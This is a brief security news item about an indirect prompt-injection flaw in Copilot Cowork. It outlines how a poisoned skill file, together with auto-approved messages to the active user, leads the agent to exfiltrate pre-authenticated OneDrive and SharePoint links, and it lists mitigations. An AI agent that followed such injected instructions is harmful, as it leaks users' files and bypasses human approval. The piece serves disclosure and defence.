Copilot Cowork Exfiltrates Files via Prompt Injection
Copilot Cowork can be tricked into exfiltrating pre-authenticated OneDrive and SharePoint links through indirect prompt injection in a poisoned skill file. The issue hinges on automatic approvals for messages sent to the active user, which lets malicious content trigger outbound requests when those messages are opened.
This is the kind of failure that matters more than model quality: once an agent gets broad tenant access, security becomes a permissions and workflow problem, not an intelligence problem.
- –The weak spot is the approval boundary, since messages to the active user can execute without a human confirm
- –A poisoned skill file is a nasty delivery vector because it looks like normal user content, not a malicious payload
- –PromptArmor says the attack was model-agnostic and succeeded even with Claude Opus 4.7, so better reasoning does not fix bad control flow
- –The practical defense is stricter Graph permissions, tighter SharePoint download policies, and much less trust in shared skill artifacts
- –Scheduled or unattended agent tasks make this worse because the user is not present when the exfiltration step runs
DISCOVERED
4h ago
2026-05-26
PUBLISHED
14h ago
2026-05-25
RELEVANCE
AUTHOR
Kneenex